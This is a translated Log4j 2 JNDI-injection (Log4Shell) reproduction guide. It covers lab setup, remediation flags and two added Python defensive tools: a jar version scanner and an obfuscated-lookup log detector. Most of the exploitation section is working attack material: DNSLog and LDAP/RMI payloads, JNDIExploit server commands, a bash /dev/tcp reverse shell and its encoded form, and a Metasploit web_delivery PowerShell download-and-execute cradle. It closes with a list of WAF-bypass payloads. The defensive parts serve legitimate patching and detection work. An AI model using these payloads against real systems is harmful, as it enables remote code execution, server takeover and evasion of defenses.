0x00 Vulnerability description
Apache Log4j is an open source Apache project; Apache Log4j 2 is a Java-based logging tool. It rewrites the Log4j framework and introduces a large number of new features. Log output can be directed to the console, files, GUI components and other destinations, and by assigning a level to every log message the logging process can be controlled at fine granularity. The framework is widely used in business application development to record log information.
Log4j 2 contains a JNDI injection vulnerability: it is triggered whenever the application logs data supplied by the user, and successful exploitation allows arbitrary code execution on the target server. Given the severity of the vulnerability, customers are advised to take protective measures as soon as possible.
0x01 Affected scope
Apache Log4j 2.x < 2.15.0-rc2
Known affected components
1、Apache Struts2
2、Apache Solr
3、Apache Flink
4、Apache Druid
5、ElasticSearch
6、Flume
7、Dubbo
8、Redis
9、Logstash
10、Kafka
11、VMware
12、spring-boot-starter-log4j2
0x02 Environment setup
I. Linux environment setup
On Linux, Vulfocus already integrates Log4j2; an online test environment can be started from the following link:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
Alternatively, pull the image with docker pull vulfocus/log4j2-rce-2021-12-09:latest and run the environment locally.

Start the Docker environment:
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

http://192.168.1.4:8080/

II. Windows local environment
Local environment: Java 8u181, Tomcat 8.5.32
Source package:
Link: https://pan.baidu.com/s/1STgDdVb4QUm9r0t9wZZA-Q
Extraction code: uodm

ROOT.war is the Tomcat deployment package: delete the ROOT directory under webapps, place ROOT.war in Tomcat's webapps directory, and start Tomcat.


0x03 Exploitation
I. DNSLog callback on Linux
Note:
Content-Type: application/x-www-form-urlencoded
POST body:
payload=${jndi:ldap://ti851c.dnslog.cn}

DNSLog result:

II. DNSLog callback on Windows
Note:
Content-Type: application/x-www-form-urlencoded
POST body:
payload=${jndi:ldap://ti851c.dnslog.cn}

DNSLog result:

III. Command echo on Linux
Note the Content-Type: application/x-www-form-urlencoded
payload=${jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho}
The JNDIExploit-1.2-SNAPSHOT.jar tool is used here to start an LDAP service:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

Execute; the command output is echoed successfully.


IV. Command echo on Windows
1. Note the Content-Type: application/x-www-form-urlencoded
The JNDIExploit-1.2-SNAPSHOT.jar tool is used here to start an LDAP service:
https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

2. This is the payload entered:
${jndi:ldap://10.206.14.240:2222/Basic/TomcatEcho}
To use it, change the IP to the IP of your own JNDI server. Put the earlier request into Repeater, add a custom header cmd: whoami, and send it to execute the command.

Execute the command and send the request; the output is echoed successfully.

V. Reverse shell on Linux
1. JDK download and installation (a JDK version below 8u121 is required)
JDK download address:

2. On the attacker machine, start the nc listener:
nc -nvlp 2333
3. Generate the bash reverse-shell payload:
bash -i >& /dev/tcp/192.168.1.14/2333 0>&1
4. Encode the payload with the online site:
https://www.jackson-t.ca/runtime-exec-payloads.html
Result:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}
5. Start an LDAP service:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.1.14"

6. Send the payload (the LDAP protocol does not work well here; switching to RMI works)
Because Java versions after 1.8.0_191 no longer enable LDAP by default, the RMI route is used for the attack here.
Note the Content-Type: application/x-www-form-urlencoded
payload=${jndi:rmi://192.168.1.14:1099/zxeiar}
7. Shell obtained successfully


VI. Reverse shell on Windows
1. Generate the PowerShell payload with msf on Kali:
use exploit/multi/script/web_delivery
set payload payload/windows/x64/powershell_reverse_tcp
set lhost 10.206.14.54
set target 2
run


2. Generated POC:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA
3. Download the JNDI-Injection-Exploit PoC from GitHub:
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
4. Choose the protocol according to the situation; here the RMI protocol is used to send the request.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -nop -w hidden -e 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" -A "192.168.1.7"


${jndi:rmi://10.206.14.240:1099/6lwxbt}

5. The Windows local shell is successfully received in msf.

0x04 How to determine exposure
Check whether the Java application includes the two jars log4j-api and log4j-core. If an application uses them, it is very likely affected.
0x05 Vulnerability investigation
1. Code check:
Check whether pom.xml references org.apache.logging.log4j or org.apache.logging.log4j2.

2. Linux command check:
sudo find / -name "*log4j-*.jar"

3. Windows command check:
Search the file system for *log4j*.jar

4. BurpLog4j2Scan passive-scan Burp plugin:
https://github.com/tangxiaofeng7/BurpLog4j2Scan/releases/download/v1.1/BurpLog4j2Scan-1.0-SNAPSHOT.jar

0x06 Remediation
1、Upgrade to log4j-2.15.0: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2、Upgrade JDK 11.0.1, 8u191, 7u201 and 6u211 to newer versions
Emergency mitigations
1、Add the parameter -Dlog4j2.formatMsgNoLookups=true to the JVM startup options
2、Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
3、Set the configuration log4j2.formatMsgNoLookups=True
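The investigation steps in 0x05 stop at finding files named *log4j*.jar, and the remediation in 0x06 needs a way to confirm that the upgrade actually landed everywhere, including inside deployed archives such as the ROOT.war from 0x02. The scanner below is an added example (not code from the page, the Vulfocus image or the Log4j project): it opens every .jar/.war/.ear regardless of file name, looks one level into bundled archives, reads the Maven version from log4j-core's pom.properties and reports whether JndiLookup.class is present, using the page's threshold (2.x below 2.15.0-rc2) as the affected range. The fixture jars it builds are constructed for the demo and are not real artifacts. A caveat not stated on the page: the log4j2.formatMsgNoLookups property listed under emergency mitigations only exists in Log4j 2.10 and later, so on older 2.x builds the version reported here is what decides the response.

```python
"""Offline scanner for Log4j 2 jars (added example, not from the page).
Reports every log4j-core jar under a directory, including copies bundled in
.war/.ear/.jar archives, and flags those inside the page's affected range
(2.x < 2.15.0-rc2) or still shipping JndiLookup.class."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Real entry names inside the log4j-core artifact.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FINAL = 10**6                   # rc number used for a final (non-rc) release
FIXED_VERSION = (2, 15, 0, 2)   # page's threshold: anything below 2.15.0-rc2


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, FINAL); '2.15.0-rc1' -> (2, 15, 0, 1)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?", text.strip())
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0), int(rc) if rc else FINAL)


def inspect_jar(label, source):
    """Inspect one jar (path or file-like object): Maven version from
    pom.properties, presence of JndiLookup.class, affected yes/no."""
    info = {"path": label, "version": None, "has_jndi_lookup": False, "affected": False}
    with zipfile.ZipFile(source) as zf:
        names = set(zf.namelist())
        info["has_jndi_lookup"] = JNDI_LOOKUP in names
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    info["version"] = line.split("=", 1)[1].strip()
    ver = parse_version(info["version"]) if info["version"] else None
    if ver is not None:
        info["affected"] = ver[0] == 2 and ver < FIXED_VERSION
    else:
        # Shaded/repackaged copy without pom.properties: the lookup class
        # itself is the deciding signal rather than assuming it is safe.
        info["affected"] = info["has_jndi_lookup"]
    return info


def scan_tree(root):
    """Like the page's `find / -name "*log4j-*.jar"`, but opens every
    .jar/.war/.ear whatever its name and one level of nested jars."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".jar", ".war", ".ear"):
            continue
        candidates = [(str(path), path)]
        try:
            with zipfile.ZipFile(path) as outer:
                for entry in outer.namelist():
                    if entry.lower().endswith(".jar"):
                        candidates.append((f"{path}!{entry}", io.BytesIO(outer.read(entry))))
        except zipfile.BadZipFile:
            continue
        for label, src in candidates:
            try:
                info = inspect_jar(label, src)
            except zipfile.BadZipFile:
                continue
            if info["version"] is not None or info["has_jndi_lookup"]:
                findings.append(info)
    return findings


def build_sample_tree(base):
    """Constructed fixture (not real artifacts): a 2.14.1 jar, a 2.15.0 jar,
    and a ROOT.war bundling a second 2.14.1 copy under WEB-INF/lib."""
    base = Path(base)
    (base / "lib").mkdir(parents=True, exist_ok=True)

    def make_jar(target, version):
        with zipfile.ZipFile(target, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder class bytes

    make_jar(base / "lib" / "log4j-core-2.14.1.jar", "2.14.1")
    make_jar(base / "lib" / "log4j-core-2.15.0.jar", "2.15.0")
    inner = io.BytesIO()
    make_jar(inner, "2.14.1")
    with zipfile.ZipFile(base / "ROOT.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
    return base


def demo():
    """Build the fixture in a temporary directory and scan it."""
    return scan_tree(build_sample_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    for f in demo():
        state = "AFFECTED" if f["affected"] else "ok"
        print(f"{state:8} {f['version'] or '?':10} jndi_lookup={f['has_jndi_lookup']} {f['path']}")
```

Run it against a real deployment by calling scan_tree("/") (or the Tomcat base directory) instead of demo(); the version column tells you whether the 0x06 upgrade reached each copy, and the jndi_lookup column is the more durable signal for repackaged jars that carry no pom.properties.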
0x07 Bypass techniques
1. Bypassing rc1
${jndi:ldap://127.0.0.1:1389/ badClassName}
2. Bypassing WAFs
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
3. JDK version requirements
RCE is fairly strict about the JDK version: the RMI route needs a JDK earlier than 6u132, 7u131 or 8u121; the LDAP route needs a JDK earlier than 11.0.1, 8u191, 7u201 or 6u211.
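The obfuscated forms under item 2 all rely on Log4j's own substitution rules (${lower:...}, ${upper:...} and the ${name:key:-default} fallback), so a WAF rule or log review that matches only the literal text ${jndi: misses them. The detector below is an added example (not code from the page): it applies those substitution rules to an input until nothing changes, then looks for a ${jndi: lookup in the canonical form, after URL-decoding so that percent-encoded payloads in access logs are caught as well. The sample log lines are constructed for the demo and use the reserved name example.invalid as the callback host.

```python
"""Detector for obfuscated Log4j lookup strings (added example, not from the
page). Collapses ${lower:}, ${upper:} and ${x:y:-default} nesting to a
canonical form, then checks for a ${jndi:...} lookup."""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")           # innermost ${...}, no nesting inside
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_one(body):
    """Resolve one lookup body the way Log4j's substitutor would for the
    forms relevant to detection; return None to leave it untouched."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None                           # this is what we want to keep
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]         # ${name:key:-default} -> default
    return None                               # env:, sys:, date: ... left as-is


def normalize(text, max_rounds=64):
    """Substitute innermost lookups repeatedly until a fixed point; the round
    cap bounds the work on adversarial, deeply nested input."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = resolve_one(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def canonical(raw):
    """URL-decode twice (double-encoded payloads) and normalize lookups."""
    return normalize(unquote(unquote(raw)))


def contains_jndi_lookup(raw):
    """True if the string carries a JNDI lookup once decoded and normalized."""
    return bool(JNDI.search(canonical(raw)))


def scan_lines(lines):
    """Return (original line, canonical form) for every line with a JNDI lookup."""
    return [(line, canonical(line)) for line in lines if contains_jndi_lookup(line)]


# Constructed sample access-log lines (not from a real system): the page's
# WAF-bypass forms wrapped in Tomcat-style entries, plus benign noise.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://example.invalid/poc}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:${lower:jndi}}:${lower:rmi}://example.invalid/poc}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://example.invalid/poc}"',
    '10.0.0.10 - - [10/Dec/2021:10:00:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.11 - - [10/Dec/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 12 "-" "${env:HOME} looks like a template but is not jndi"',
]


if __name__ == "__main__":
    for raw, canon in scan_lines(SAMPLE_LOG):
        print("HIT ", raw.split()[0], "->", canon[canon.lower().find("${jndi"):][:60])
```

The detector is scheme-agnostic: it flags ldap://, rmi:// and any other JNDI URL alike, since the JDK version limits in item 3 only affect exploitability, not whether a lookup was attempted. Feed it real access or application logs line by line and review the canonical form, which also makes the callback host easy to extract for blocking.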